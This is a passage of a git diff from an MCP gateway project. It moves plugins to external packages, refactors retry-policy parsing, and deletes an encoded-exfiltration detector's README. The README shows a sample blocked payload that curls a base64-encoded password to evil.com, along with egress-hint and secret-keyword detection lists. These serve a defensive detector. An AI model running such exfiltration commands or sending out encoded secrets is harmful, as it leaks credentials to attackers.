**Rust not installed**: Install from https://rustup.rs -2. **Wrong Rust version**: Update with `rustup update` -3. **Missing dependencies**: `cargo clean && cargo build` -4. **Python version mismatch**: Ensure Python 3.11+ - -## Development Guide - -### Creating New Rust Plugins - -1. **Create Plugin Directory**: -```bash -mkdir plugins_rust/my_plugin -cd plugins_rust/my_plugin -``` - -2. **Initialize Rust Project**: -```bash -# Create Cargo.toml, pyproject.toml, Makefile -# See existing plugins for templates -``` - -3. **Implement PyO3 Bindings**: -```rust -// src/lib.rs -use pyo3::prelude::*; - -#[pyclass] -pub struct MyPluginRust { - // Plugin state -} - -#[pymethods] -impl MyPluginRust { - #[new] - pub fn new(config: &PyDict) -> PyResult { - Ok(Self { /* ... */ }) - } - - pub fn process(&self, text: &str) -> PyResult { - Ok(text.to_uppercase()) - } -} - -#[pymodule] -fn my_plugin_rust(_py: Python, m: &PyModule) -> PyResult<()> { - m.add_class::()?; - Ok(()) -} -``` - -4. **Create Python Wrapper**: -```python -# plugins/my_plugin/my_plugin_rust.py -from my_plugin_rust.my_plugin_rust import MyPluginRust - -class RustMyPlugin: - def __init__(self, config): - self._rust = MyPluginRust(config.model_dump()) - - def process(self, text: str) -> str: - return self._rust.process(text) -``` - -**Note**: The double-nested import (`my_plugin_rust.my_plugin_rust`) is required because: -- First `my_plugin_rust` = package name (from `Cargo.toml` `[lib] name`) -- Second `my_plugin_rust` = module name (from `#[pymodule]` in `lib.rs`) - -5. **Add Auto-Detection**: -```python -# plugins/my_plugin/my_plugin.py -try: - from .my_plugin_rust import RustMyPlugin - RUST_AVAILABLE = True -except ImportError: - RUST_AVAILABLE = False - -class MyPlugin(Plugin): - def __init__(self, config): - if RUST_AVAILABLE: - self.impl = RustMyPlugin(config) - else: - self.impl = PythonMyPlugin(config) -``` - -### Best Practices - -1. **API Compatibility**: Ensure Rust and Python implementations have identical APIs -2. **Error Handling**: Convert Rust errors to Python exceptions properly -3. **Type Conversions**: Use PyO3's `extract()` and `IntoPy` for seamless conversions -4. **Testing**: Write differential tests to ensure identical behavior -5. **Documentation**: Document performance characteristics and trade-offs - -## CI/CD Integration - -### GitHub Actions Workflow - -The repository includes automated CI/CD for Rust plugins: - -```yaml -# .github/workflows/rust-plugins.yml -- Multi-platform builds (Linux, macOS, Windows) -- Rust linting (clippy, rustfmt) -- Comprehensive testing (unit, integration, differential) -- Performance benchmarking -- Security audits (cargo-audit) -- Code coverage tracking -- Automatic wheel publishing to PyPI -``` - -### Local CI Checks - -```bash -# Run full CI pipeline locally -make rust-check # Format, lint, test -make rust-test-all # All test suites -make rust-bench # Performance benchmarks -make rust-audit # Security audit -make rust-coverage # Code coverage report -``` - -## Performance Optimizations - -### Rust-Specific Optimizations - -1. **RegexSet for Parallel Matching**: All patterns matched in single pass (O(M) vs O(N×M)) -2. **Copy-on-Write Strings**: Zero-copy when no masking needed -3. **Stack Allocation**: Minimize heap allocations for hot paths -4. **Inlining**: Aggressive inlining for small functions -5. **LTO (Link-Time Optimization)**: Enabled in release builds - -### Configuration for Best Performance - -```toml -# plugins_rust/Cargo.toml -[profile.release] -opt-level = 3 # Maximum optimization -lto = "fat" # Full link-time optimization -codegen-units = 1 # Better optimization, slower compile -strip = true # Strip symbols for smaller binary -``` - -## Security Considerations - -### Memory Safety - -- **No Buffer Overflows**: Rust's ownership system prevents them at compile-time -- **No Use-After-Free**: Borrow checker ensures memory safety -- **No Data Races**: Safe concurrency guarantees -- **Input Validation**: All Python inputs validated before processing - -### Audit and Compliance - -```bash -# Run security audit (from a specific plugin directory) -cd plugins_rust/pii_filter -cargo audit -``` - -## Future Rust Plugins - -Planned Rust implementations: - -- **Regex Filter**: Pattern matching and replacement (5-8x speedup) -- **JSON Repair**: Fast JSON validation and repair (10x+ speedup) -- **SQL Sanitizer**: SQL injection detection (8-10x speedup) -- **Rate Limiter**: High-throughput rate limiting (15x+ speedup) -- **Compression**: Fast compression/decompression (5-10x speedup) - -## Resources - -### Documentation -- [PyO3 Documentation](https://pyo3.rs) -- [Rust Book](https://doc.rust-lang.org/book/) -- [Maturin Guide](https://www.maturin.rs) - -### Project Files -- `plugins_rust/README.md` - Detailed Rust plugin documentation -- `plugins_rust/IMPLEMENTATION_STATUS.md` - Implementation status and results -- `plugins_rust/BUILD_AND_TEST_RESULTS.md` - Build and test report - -### Community -- GitHub Issues: https://github.com/IBM/mcp-context-forge/issues -- Contributing: See `CONTRIBUTING.md` - -## Migration Guide - -### From Python to Rust - -If you have an existing Python plugin you want to optimize: - -1. **Measure First**: Profile to identify bottlenecks -2. **Start Small**: Convert hot paths first -3. **Maintain API**: Keep identical interface for drop-in replacement -4. **Test Thoroughly**: Use differential testing -5. **Benchmark**: Verify actual performance improvements - -### Gradual Migration - -You don't need to convert entire plugins at once: - -```python -class MyPlugin(Plugin): - def __init__(self, config): - # Use Rust for expensive operations - if RUST_AVAILABLE: - self.detector = RustDetector(config) - else: - self.detector = PythonDetector(config) - - # Keep other logic in Python - self.cache = {} - self.stats = PluginStats() - - async def process(self, payload, context): - # Rust-accelerated detection - results = self.detector.detect(payload.text) - - # Python logic for everything else - self.update_stats(results) - return self.format_response(results) -``` - -## Support - -For issues, questions, or contributions related to Rust plugins: - -1. Check existing GitHub issues -2. Review build and test documentation -3. Open a new issue with: - - - Rust/Python versions - - Build logs - - Error messages - - Minimal reproduction case - ---- - -**Status**: Production Ready -**Performance**: 5-10x faster than Python -**Compatibility**: 100% API compatible -**Installation**: `pip install mcpgateway[rust]` diff --git a/llms/plugins-llms.md b/llms/plugins-llms.md index 515536a0d0..7de081b017 100644 --- a/llms/plugins-llms.md +++ b/llms/plugins-llms.md @@ -175,7 +175,7 @@ Optimization: - `response_cache_by_prompt` - Response caching - `circuit_breaker` - Circuit breaker pattern - `retry_with_backoff` - Retry logic with backoff -- `rate_limiter` - Rate limiting +- `cpex-rate-limiter` - Rate limiting (external package: `cpex_rate_limiter.RateLimiterPlugin`) - `output_length_guard` - Output length limits Utilities: @@ -201,7 +201,7 @@ Examples: - Normalizes Unicode (NFC/NFD/NFKC/NFKD), trims/collapses whitespace, optional casing, numeric date strings to ISO `YYYY-MM-DD`, and numbers to canonical form (dot decimal, no thousands). Per-field overrides via regex. - Config: `enable_unicode`, `unicode_form`, `remove_control_chars`, `enable_whitespace`, `trim`, `collapse_internal`, `normalize_newlines`, `collapse_blank_lines`, `enable_casing`, `case_strategy`, `enable_dates`, `day_first`, `year_first`, `enable_numbers`, `decimal_detection`, `field_overrides`. - Ordering: place before PII filter (lower priority value) so PII patterns see stabilized inputs. Recommended mode: `permissive`. -- `PIIFilterPlugin` (`plugins/pii_filter/pii_filter.py`) +- `PIIFilterPlugin` (PyPI package: `cpex-pii-filter`) - Hooks: prompt pre/post, tool pre/post - Detects and masks PII (SSN, credit card, email, phone, IP, keys, etc.) via regex; supports strategies: redact/partial/hash/tokenize/remove - Config: detection toggles, `default_mask_strategy`, `redaction_text`, `block_on_detection`, `log_detections`, `whitelist_patterns`, `custom_patterns` @@ -382,7 +382,7 @@ async function toolPreInvoke({ payload, context }: any) { """ plugins: - name: "PIIFilterPlugin" - kind: "plugins.pii_filter.pii_filter.PIIFilterPlugin" + kind: "cpex_pii_filter.PIIFilterPlugin" hooks: ["prompt_pre_fetch"] mode: "permissive" priority: 1 diff --git a/mcpgateway/auth.py b/mcpgateway/auth.py index cf772f3dec..59fe9c9e3c 100644 --- a/mcpgateway/auth.py +++ b/mcpgateway/auth.py @@ -1192,7 +1192,6 @@ def _set_trace_for_user(user_obj: EmailUser, *, teams: Any = _UNSET, auth_method team_id = getattr(getattr(request, "state", None), "team_id", None) if request else None # Extract content type from headers content_type = headers.get("content-type") if headers else None - # Create global context global_context = GlobalContext( request_id=request_id, server_id=None, diff --git a/mcpgateway/services/tool_service.py b/mcpgateway/services/tool_service.py index 6043ee834c..8fbd2dc831 100644 --- a/mcpgateway/services/tool_service.py +++ b/mcpgateway/services/tool_service.py @@ -562,6 +562,77 @@ def __init__(self, message: str, retry_delay_ms: int = 0) -> None: self.retry_delay_ms = retry_delay_ms +def _coerce_retry_policy_int(raw_value: Any, *, default: int, minimum: int) -> int: + """Normalize retry policy integer settings from plugin config.""" + if raw_value is None: + return default + value = int(raw_value) + if value < minimum: + raise ValueError(f"Retry policy integer must be >= {minimum}") + return value + + +def _coerce_retry_policy_statuses(raw_value: Any) -> List[int]: + """Normalize retryable status codes from plugin config.""" + if raw_value is None: + return [429, 500, 502, 503, 504] + if isinstance(raw_value, (str, bytes)) or not isinstance(raw_value, (list, tuple, set)): + raise ValueError("Retry policy retry_on_status must be a sequence of integers") + return [int(code) for code in raw_value] + + +def _coerce_retry_policy_bool(raw_value: Any, *, default: bool) -> bool: + """Normalize retry policy booleans using explicit string parsing.""" + if raw_value is None: + return default + if isinstance(raw_value, bool): + return raw_value + if isinstance(raw_value, (int, float)) and raw_value in (0, 1): + return bool(raw_value) + if isinstance(raw_value, str): + normalized = raw_value.strip().lower() + if normalized in {"1", "true", "t", "yes", "y", "on"}: + return True + if normalized in {"0", "false", "f", "no", "n", "off"}: + return False + raise ValueError("Retry policy boolean must be a bool-like value") + + +def _build_retry_policy_config(raw_cfg: Optional[Dict[str, Any]], tool_name: str) -> Dict[str, Any]: + """Build a gateway-owned retry policy view from plugin config.""" + cfg = raw_cfg or {} + if not isinstance(cfg, dict): + raise ValueError("Retry policy config must be a mapping") + effective_cfg: Dict[str, Any] = { + "max_retries": _coerce_retry_policy_int(cfg.get("max_retries"), default=2, minimum=0), + "backoff_base_ms": _coerce_retry_policy_int(cfg.get("backoff_base_ms"), default=200, minimum=1), + "max_backoff_ms": _coerce_retry_policy_int(cfg.get("max_backoff_ms"), default=5000, minimum=1), + "retry_on_status": _coerce_retry_policy_statuses(cfg.get("retry_on_status")), + "jitter": _coerce_retry_policy_bool(cfg.get("jitter"), default=True), + "check_text_content": _coerce_retry_policy_bool(cfg.get("check_text_content"), default=False), + } + + tool_overrides = cfg.get("tool_overrides") or {} + if not isinstance(tool_overrides, dict): + raise ValueError("Retry policy tool_overrides must be a mapping") + + overrides = tool_overrides.get(tool_name) + if overrides: + if not isinstance(overrides, dict): + raise ValueError("Retry policy tool override must be a mapping") + effective_cfg.update({key: value for key, value in overrides.items() if key in effective_cfg}) + effective_cfg["max_retries"] = _coerce_retry_policy_int(effective_cfg.get("max_retries"), default=2, minimum=0) + effective_cfg["backoff_base_ms"] = _coerce_retry_policy_int(effective_cfg.get("backoff_base_ms"), default=200, minimum=1) + effective_cfg["max_backoff_ms"] = _coerce_retry_policy_int(effective_cfg.get("max_backoff_ms"), default=5000, minimum=1) + effective_cfg["retry_on_status"] = _coerce_retry_policy_statuses(effective_cfg.get("retry_on_status")) + effective_cfg["jitter"] = _coerce_retry_policy_bool(effective_cfg.get("jitter"), default=True) + effective_cfg["check_text_content"] = _coerce_retry_policy_bool(effective_cfg.get("check_text_content"), default=False) + + effective_cfg["max_retries"] = min(effective_cfg["max_retries"], settings.max_tool_retries) + + return effective_cfg + + class ToolService(BaseService): """Service for managing and invoking tools. @@ -3360,9 +3431,6 @@ def _build_rust_native_tool_post_invoke_retry_policy( from mcpgateway.plugins.framework import PluginMode # pylint: disable=import-outside-toplevel from mcpgateway.plugins.framework.utils import payload_matches # pylint: disable=import-outside-toplevel - # Third-Party/Local - from plugins.retry_with_backoff.retry_with_backoff import RetryConfig # pylint: disable=import-outside-toplevel - global_context = hook_global_context or GlobalContext(request_id=get_correlation_id() or uuid.uuid4().hex) payload = ToolPostInvokePayload(name=tool_name, result={}) hook_refs = plugin_manager._registry.get_hook_refs_for_hook(hook_type=ToolHookType.TOOL_POST_INVOKE) # pylint: disable=protected-access @@ -3382,31 +3450,22 @@ def _build_rust_native_tool_post_invoke_retry_policy( return (None, True) retry_hook = active_hook_refs[0] - effective_cfg = RetryConfig(**(retry_hook.plugin_ref.plugin.config.config or {})) - ceiling = settings.max_tool_retries - if effective_cfg.max_retries > ceiling: - effective_cfg = effective_cfg.model_copy(update={"max_retries": ceiling}) - - overrides = effective_cfg.tool_overrides.get(tool_name) - if overrides: - merged_cfg = effective_cfg.model_dump() - merged_cfg.update(overrides) - merged_cfg.pop("tool_overrides", None) - effective_cfg = RetryConfig(**merged_cfg) - if effective_cfg.max_retries > ceiling: - effective_cfg = effective_cfg.model_copy(update={"max_retries": ceiling}) - - if effective_cfg.check_text_content: + try: + effective_cfg = _build_retry_policy_config(retry_hook.plugin_ref.plugin.config.config or {}, tool_name) + except (TypeError, ValueError): + return (None, True) + + if effective_cfg["check_text_content"]: return (None, True) return ( { "kind": "retry_with_backoff", - "maxRetries": int(effective_cfg.max_retries), - "backoffBaseMs": int(effective_cfg.backoff_base_ms), - "maxBackoffMs": int(effective_cfg.max_backoff_ms), - "retryOnStatus": list(effective_cfg.retry_on_status), - "jitter": bool(effective_cfg.jitter), + "maxRetries": effective_cfg["max_retries"], + "backoffBaseMs": effective_cfg["backoff_base_ms"], + "maxBackoffMs": effective_cfg["max_backoff_ms"], + "retryOnStatus": effective_cfg["retry_on_status"], + "jitter": effective_cfg["jitter"], }, False, ) diff --git a/plugins/config-pii-guardian-policy.yaml b/plugins/config-pii-guardian-policy.yaml index 1494041e24..43cac30e86 100644 --- a/plugins/config-pii-guardian-policy.yaml +++ b/plugins/config-pii-guardian-policy.yaml @@ -58,9 +58,9 @@ plugins: # PII Filter Plugin - Run first with highest priority for security - name: "PIIFilterPlugin" - kind: "plugins.pii_filter.pii_filter.PIIFilterPlugin" + kind: "cpex_pii_filter.PIIFilterPlugin" description: "Detects and masks Personally Identifiable Information" - version: "0.1.0" + version: "0.2.0" author: "Mihai Criveti" hooks: ["prompt_pre_fetch", "prompt_post_fetch", "tool_pre_invoke", "tool_post_invoke"] tags: ["security", "pii", "compliance", "filter", "gdpr", "hipaa"] @@ -206,11 +206,11 @@ plugins: conditions: [] config: {} - # Rate limiter (fixed window, in-memory) + # Rate limiter (cpex-rate-limiter package) - name: "RateLimiterPlugin" - kind: "plugins.rate_limiter.rate_limiter.RateLimiterPlugin" + kind: "cpex_rate_limiter.RateLimiterPlugin" description: "Per-user/tenant/tool rate limits" - version: "0.1.0" + version: "0.0.3" author: "Mihai Criveti" hooks: ["prompt_pre_fetch", "tool_pre_invoke"] tags: ["limits", "throttle"] @@ -288,9 +288,9 @@ plugins: # URL reputation static checks - name: "URLReputationPlugin" - kind: "plugins.url_reputation.url_reputation.URLReputationPlugin" + kind: "cpex_url_reputation.URLReputationPlugin" description: "Blocks known-bad domains or patterns before fetch" - version: "0.1.0" + version: "0.1.1" author: "Mihai Criveti" hooks: ["resource_pre_fetch"] tags: ["security", "url", "reputation"] @@ -319,7 +319,7 @@ plugins: # Retry policy annotations - name: "RetryWithBackoffPlugin" - kind: "plugins.retry_with_backoff.retry_with_backoff.RetryWithBackoffPlugin" + kind: "cpex_retry_with_backoff.RetryWithBackoffPlugin" description: "Annotates retry/backoff policy in metadata" version: "0.1.0" author: "Mihai Criveti" @@ -638,7 +638,7 @@ plugins: # Secrets Detection - regex-based detector for common secrets/keys - name: "SecretsDetection" - kind: "plugins.secrets_detection.secrets_detection.SecretsDetectionPlugin" + kind: "cpex_secrets_detection.SecretsDetectionPlugin" description: "Detects keys/tokens/secrets in inputs/outputs; optional redaction/blocking" version: "0.1.0" author: "ContextForge" @@ -665,9 +665,9 @@ plugins: # Encoded Exfil Detector - detect suspicious encoded payloads in prompts/tool outputs - name: "EncodedExfilDetector" - kind: "plugins.encoded_exfil_detector.encoded_exfil_detector.EncodedExfilDetectorPlugin" + kind: "cpex_encoded_exfil_detection.EncodedExfilDetectorPlugin" description: "Detects suspicious encoded exfiltration patterns in prompt args and tool outputs" - version: "0.1.0" + version: "0.2.0" author: "Mihai Criveti" hooks: ["prompt_pre_fetch", "tool_post_invoke"] tags: ["security", "exfiltration", "dlp", "encoding"] diff --git a/plugins/config.yaml b/plugins/config.yaml index aa64a12c17..9d1c936b9f 100644 --- a/plugins/config.yaml +++ b/plugins/config.yaml @@ -58,9 +58,9 @@ plugins: # PII Filter Plugin - Run first with highest priority for security - name: "PIIFilterPlugin" - kind: "plugins.pii_filter.pii_filter.PIIFilterPlugin" + kind: "cpex_pii_filter.PIIFilterPlugin" description: "Detects and masks Personally Identifiable Information" - version: "0.1.0" + version: "0.2.0" author: "Mihai Criveti" hooks: ["prompt_pre_fetch", "prompt_post_fetch", "tool_pre_invoke", "tool_post_invoke"] tags: ["security", "pii", "compliance", "filter", "gdpr", "hipaa"] @@ -204,11 +204,11 @@ plugins: conditions: [] config: {} - # Rate limiter (fixed window, Redis-backed for shared state across instances) + # Rate limiter (cpex-rate-limiter package) - name: "RateLimiterPlugin" - kind: "plugins.rate_limiter.rate_limiter.RateLimiterPlugin" + kind: "cpex_rate_limiter.RateLimiterPlugin" description: "Per-user/tenant/tool rate limits" - version: "0.1.0" + version: "0.0.3" author: "Mihai Criveti" hooks: ["prompt_pre_fetch", "tool_pre_invoke"] tags: ["limits", "throttle"] @@ -290,9 +290,9 @@ plugins: # URL reputation static checks - name: "URLReputationPlugin" - kind: "plugins.url_reputation.url_reputation.URLReputationPlugin" + kind: "cpex_url_reputation.URLReputationPlugin" description: "Blocks known-bad domains or patterns before fetch" - version: "0.1.0" + version: "0.1.1" author: "Mihai Criveti" hooks: ["resource_pre_fetch"] tags: ["security", "url", "reputation"] @@ -321,7 +321,7 @@ plugins: # Retry with exponential backoff — triggers real gateway re-invocation - name: "RetryWithBackoffPlugin" - kind: "plugins.retry_with_backoff.retry_with_backoff.RetryWithBackoffPlugin" + kind: "cpex_retry_with_backoff.RetryWithBackoffPlugin" description: "Detects transient failures and asks the gateway to re-invoke the tool after a jittered exponential backoff delay" version: "0.1.0" author: "Mihai Criveti" @@ -656,7 +656,7 @@ plugins: # Secrets Detection - regex-based detector for common secrets/keys - name: "SecretsDetection" - kind: "plugins.secrets_detection.secrets_detection.SecretsDetectionPlugin" + kind: "cpex_secrets_detection.SecretsDetectionPlugin" description: "Detects keys/tokens/secrets in inputs/outputs; optional redaction/blocking" version: "0.1.0" author: "ContextForge" @@ -682,7 +682,7 @@ plugins: # Encoded Exfil Detector - detect suspicious encoded payloads in prompts, tool outputs, and resources - name: "EncodedExfilDetector" - kind: "plugins.encoded_exfil_detection.encoded_exfil_detector.EncodedExfilDetectorPlugin" + kind: "cpex_encoded_exfil_detection.EncodedExfilDetectorPlugin" description: "Detects suspicious encoded exfiltration patterns in prompts, tool outputs, and resources" version: "0.2.0" author: "Mihai Criveti" diff --git a/plugins/encoded_exfil_detection/README.md b/plugins/encoded_exfil_detection/README.md deleted file mode 100644 index 5b1e3d7e54..0000000000 --- a/plugins/encoded_exfil_detection/README.md +++ /dev/null @@ -1,258 +0,0 @@ -# Encoded Exfil Detector Plugin - -> Author: Mihai Criveti | Hardened by: Pratik Gandhi - -Detects suspicious encoded payload exfiltration patterns in prompt arguments, tool outputs, and resource content. Blocks or redacts detected payloads based on a multi-factor suspicion scoring system. - -## Overview - -In an MCP gateway, an attacker could encode sensitive data (credentials, API keys, private keys) using base64, hex, or percent-encoding to bypass plaintext content filters. This plugin decodes candidate segments, scores them on multiple suspicion indicators, and blocks or redacts payloads that exceed the configured threshold. - -Uses Rust acceleration automatically when the `encoded_exfil_detection_rust` wheel is installed, otherwise falls back to a pure Python implementation with identical behavior. - -## Hooks - -| Hook | Purpose | -|------|---------| -| `prompt_pre_fetch` | Scan prompt arguments before execution | -| `tool_post_invoke` | Scan tool outputs after execution | -| `resource_post_fetch` | Scan fetched resource content | - -## Detection Types - -| Encoding | Pattern | Min Chars | Example | -|----------|---------|-----------|---------| -| Base64 | `[A-Za-z0-9+/]{16,}={0,2}` | 16 | `cGFzc3dvcmQ9c2VjcmV0` | -| Base64URL | `[A-Za-z0-9_-]{16,}={0,2}` | 16 | `cGFzc3dvcmQ9c2VjcmV0` | -| Hex | `[A-Fa-f0-9]{24,}` | 24 | `70617373776f72643d736563726574` | -| Percent-encoding | `(?:%[0-9A-Fa-f]{2}){8,}` | 8 sequences | `%70%61%73%73%77%6f%72%64` | -| Escaped hex | `(?:\\x[0-9A-Fa-f]{2}){8,}` | 8 sequences | `\x70\x61\x73\x73\x77\x6f\x72\x64` | - -### Nested Encoding - -The plugin peels multiple encoding layers (e.g., `base64(hex(secret))`). The `max_decode_depth` parameter controls how many layers are decoded. At each layer, the decoded content is re-scanned for additional encoded segments. - -## Scoring Mechanism - -Each decoded candidate is scored against multiple suspicion indicators. Only candidates meeting or exceeding `min_suspicion_score` are reported. - -| Indicator | Points | Condition | -|-----------|--------|-----------| -| Decodable | +1 | Candidate successfully decodes | -| High entropy | +1 | Shannon entropy >= `min_entropy` | -| Printable payload | +1 | Printable ASCII ratio >= `min_printable_ratio` | -| Sensitive keywords | +2 | Decoded content contains keywords like `password`, `token`, `api_key`, `bearer`, `ssh-rsa`, etc. | -| Egress context | +1 | Nearby text contains egress hints like `curl`, `webhook`, `upload`, `https://`, etc. | -| Long segment | +1 | Candidate length >= 2x `min_encoded_length` | - -**Maximum possible score: 7** - -### Built-in Sensitive Keywords - -`password`, `passwd`, `secret`, `token`, `api_key`, `apikey`, `authorization`, `bearer`, `cookie`, `session`, `private key`, `ssh-rsa`, `refresh_token`, `client_secret` - -### Built-in Egress Hints - -`curl`, `wget`, `http://`, `https://`, `upload`, `webhook`, `beacon`, `dns`, `exfil`, `pastebin`, `socket`, `send` - -Both lists can be extended via `extra_sensitive_keywords` and `extra_egress_hints` configuration. - -## Configuration Reference - -### Full Example - -```yaml -- name: "EncodedExfilDetector" - kind: "plugins.encoded_exfil_detection.encoded_exfil_detector.EncodedExfilDetectorPlugin" - hooks: ["prompt_pre_fetch", "tool_post_invoke", "resource_post_fetch"] - mode: "enforce" - priority: 52 - config: - # Per-encoding enable/disable - enabled: - base64: true - base64url: true - hex: true - percent_encoding: true - escaped_hex: true - - # Detection thresholds - min_encoded_length: 24 # Min candidate length (8-8192) - min_decoded_length: 12 # Min decoded bytes (4-32768) - min_entropy: 3.3 # Shannon entropy threshold (0.0-8.0) - min_printable_ratio: 0.70 # Printable ASCII ratio (0.0-1.0) - min_suspicion_score: 3 # Score threshold to flag (1-10) - - # Safety limits - max_scan_string_length: 200000 # Skip strings above this size (1K-5M) - max_findings_per_value: 50 # Per-string finding cap (1-500) - max_decode_depth: 2 # Nested encoding layers to peel (1-5) - max_recursion_depth: 32 # Container nesting depth limit (1-1000) - - # Actions - redact: false - redaction_text: "***ENCODED_REDACTED***" - block_on_detection: true - min_findings_to_block: 1 # Findings required to block (1-1000) - include_detection_details: true - - # Allowlisting (regex patterns to skip known-good encoded strings) - allowlist_patterns: [] - # - "eyJhbGciOiJSUzI1NiI.*" # Known JWT prefix - # - "data:image/png;base64,.*" # Image data URIs - - # Custom keywords and egress hints (merged with built-in defaults) - extra_sensitive_keywords: [] - # - "watsonx_api" - # - "ibm_cloud_key" - extra_egress_hints: [] - # - "s3_upload" - # - "mq_publish" - - # Logging - log_detections: true -``` - -### Parameter Reference - -| Parameter | Type | Default | Range | Description | -|-----------|------|---------|-------|-------------| -| `enabled` | dict[str, bool] | all true | — | Enable/disable each encoding type | -| `min_encoded_length` | int | 24 | 8-8192 | Minimum candidate segment length | -| `min_decoded_length` | int | 12 | 4-32768 | Minimum decoded byte length | -| `min_entropy` | float | 3.3 | 0.0-8.0 | Shannon entropy threshold | -| `min_printable_ratio` | float | 0.70 | 0.0-1.0 | Minimum printable ASCII ratio | -| `min_suspicion_score` | int | 3 | 1-10 | Score threshold to flag | -| `max_scan_string_length` | int | 200000 | 1K-5M | Skip strings above this size | -| `max_findings_per_value` | int | 50 | 1-500 | Per-string finding limit | -| `max_decode_depth` | int | 2 | 1-5 | Nested encoding layers to peel | -| `max_recursion_depth` | int | 32 | 1-1000 | Container nesting depth limit | -| `redact` | bool | false | — | Replace detected segments with `redaction_text` | -| `redaction_text` | str | `***ENCODED_REDACTED***` | — | Replacement text for redaction | -| `block_on_detection` | bool | true | — | Block request on findings | -| `min_findings_to_block` | int | 1 | 1-1000 | Number of findings required to block | -| `include_detection_details` | bool | true | — | Include full findings in metadata | -| `allowlist_patterns` | list[str] | [] | — | Regex patterns to skip (validated at init) | -| `extra_sensitive_keywords` | list[str] | [] | — | Additional sensitive keywords | -| `extra_egress_hints` | list[str] | [] | — | Additional egress context hints | -| `log_detections` | bool | true | — | Log detection events | - -## Annotated Example Payloads - -### Blocked: base64-encoded credential near egress context - -```json -{"args": {"input": "curl -d 'cGFzc3dvcmQ9c3VwZXItc2VjcmV0LXRva2Vu' https://evil.com/collect"}} -``` - -**Score: 7** (decodable + high_entropy + printable_payload + sensitive_keywords + egress_context + long_segment) -- Decodes to: `password=super-secret-token` -- Contains keyword: `password` -- Egress context: `curl`, `https://` -- Result: **BLOCKED** with violation code `ENCODED_EXFIL_DETECTED` - -### Allowed: normal text without encoded payloads - -```json -{"args": {"input": "What is the weather in San Francisco?"}} -``` - -**Score: 0** — no encoded segments detected, passes through unmodified. - -### Allowed: short base64 below threshold - -```json -{"args": {"input": "The ID is YWJjZA=="}} -``` - -Not flagged — candidate `YWJjZA==` (8 chars) is below `min_encoded_length` (24). - -### Redacted: hex-encoded payload with redaction enabled - -Config: `redact: true`, `block_on_detection: false` - -```json -{"result": {"data": "POST /collect data=70617373776f72643d7365637265742d76616c7565"}} -``` - -The hex segment decodes to `password=secret-value`. With redaction enabled, the output becomes: - -```json -{"result": {"data": "POST /collect data=***ENCODED_REDACTED***"}} -``` - -## Tuning Guide - -### Reducing False Positives - -**Problem**: Legitimate base64 (JWTs, image data URIs, hashes) triggers detection. - -**Solutions**: -1. **Allowlist known patterns**: Add regex patterns to `allowlist_patterns` for known-good encoded strings. -2. **Raise `min_suspicion_score`**: Default 3 catches most real attacks. Raising to 4-5 requires stronger signals (sensitive keywords + egress context). -3. **Raise `min_encoded_length`**: Default 24 is conservative. Raising to 32-48 skips shorter encoded strings. -4. **Disable specific encodings**: Set `enabled.hex: false` if hex strings are common in your workflow. - -### Increasing Sensitivity - -**Problem**: Encoded exfiltration attempts are not being caught. - -**Solutions**: -1. **Lower `min_suspicion_score`**: Setting to 1-2 flags any decodable segment. -2. **Add custom keywords**: Use `extra_sensitive_keywords` for domain-specific secrets (e.g., `watsonx_api`, `ibm_cloud_key`). -3. **Add custom egress hints**: Use `extra_egress_hints` for domain-specific egress patterns (e.g., `s3_upload`, `mq_publish`). -4. **Increase `max_decode_depth`**: Default 2 peels two encoding layers. Raising to 3-5 catches deeper nesting. - -### Tuning `min_entropy` - -Shannon entropy measures randomness in the decoded payload: -- **0.0**: All identical bytes (e.g., `AAAA...`) -- **3.0-4.0**: English text, simple passwords -- **5.0-6.0**: Complex passwords, API keys -- **7.0-8.0**: Cryptographic keys, random bytes - -Default **3.3** catches most real secrets while skipping trivial decoded content. Raise to 4.0+ for stricter filtering. - -## Rust Acceleration - -When the `mcpgateway-encoded-exfil-detection` wheel is installed (`uv pip install -e plugins_rust/encoded_exfil_detection/`), the plugin automatically uses the Rust implementation for scanning. The Rust path uses a persistent `ExfilDetectorEngine` that parses config once at init, pre-compiled static regexes, fixed-size arrays for entropy calculation, and optimized boundary validation. - -If the Rust module fails to load (missing wheel, import error), the plugin silently falls back to the pure Python implementation. The `implementation` field in metadata indicates which path was used (`"Rust"` or `"Python"`). - -Both implementations produce identical results for the same input (verified by parity tests). - -## Behavior Summary - -| Config | Behavior | -|--------|----------| -| `block_on_detection: true` | Returns violation code `ENCODED_EXFIL_DETECTED`, stops processing | -| `block_on_detection: false`, `redact: true` | Replaces detected segments with `redaction_text`, continues | -| `block_on_detection: false`, `redact: false` | Emits metadata with finding count and details, continues | - -Metadata emitted on detection: -```json -{ - "encoded_exfil_count": 1, - "encoded_exfil_findings": [{"encoding": "base64", "path": "args.input", "score": 5, ...}], - "implementation": "Rust" -} -``` - -## Performance - -When the Rust wheel is installed, the plugin is significantly faster. Benchmarks run via `plugins_rust/encoded_exfil_detection/compare_performance.py`: - -| Scenario | Python | Rust | Speedup | -|----------|--------|------|---------| -| 1 base64 finding | 0.035ms | 0.007ms | **4.7x** | -| 5 mixed findings | 0.106ms | 0.018ms | **5.7x** | -| 20+ mixed findings | 0.662ms | 0.086ms | **7.7x** | -| ~50KB text, 2 findings | 1.432ms | 0.118ms | **12.1x** | -| Clean payload (no findings) | 0.014ms | 0.003ms | **4.3x** | - -Rust speedup scales with payload size due to pre-compiled static regexes, fixed-size entropy arrays, and zero-copy string processing. - -## Known Limitations - -- **Cross-request correlation**: The plugin is stateless. Slow exfiltration split across multiple requests is not correlated. -- **Custom encoding patterns**: Only the 5 built-in encoding types are supported. User-defined regex patterns are not accepted to avoid ReDoS risk. diff --git a/plugins/encoded_exfil_detection/__init__.py b/plugins/encoded_exfil_detection/__init__.py deleted file mode 100644 index 853f61fe6a..0000000000 --- a/plugins/encoded_exfil_detection/__init__.py +++ /dev/null @@ -1,11 +0,0 @@ -# -*- coding: utf-8 -*- -"""Encoded exfiltration detector plugin. - -Location: ./plugins/encoded_exfil_detection/__init__.py -Copyright 2026 -SPDX-License-Identifier: Apache-2.0 -""" - -from .encoded_exfil_detector import EncodedExfilDetectorConfig, EncodedExfilDetectorPlugin - -__all__ = ["EncodedExfilDetectorConfig", "EncodedExfilDetectorPlugin"] diff --git a/plugins/encoded_exfil_detection/encoded_exfil_detector.py b/plugins/encoded_exfil_detection/encoded_exfil_detector.py deleted file mode 100644 index f00f595aed..0000000000 --- a/plugins/encoded_exfil_detection/encoded_exfil_detector.py +++ /dev/null @@ -1,636 +0,0 @@ -# -*- coding: utf-8 -*- -"""Location: ./plugins/encoded_exfil_detection/encoded_exfil_detector.py -Copyright 2026 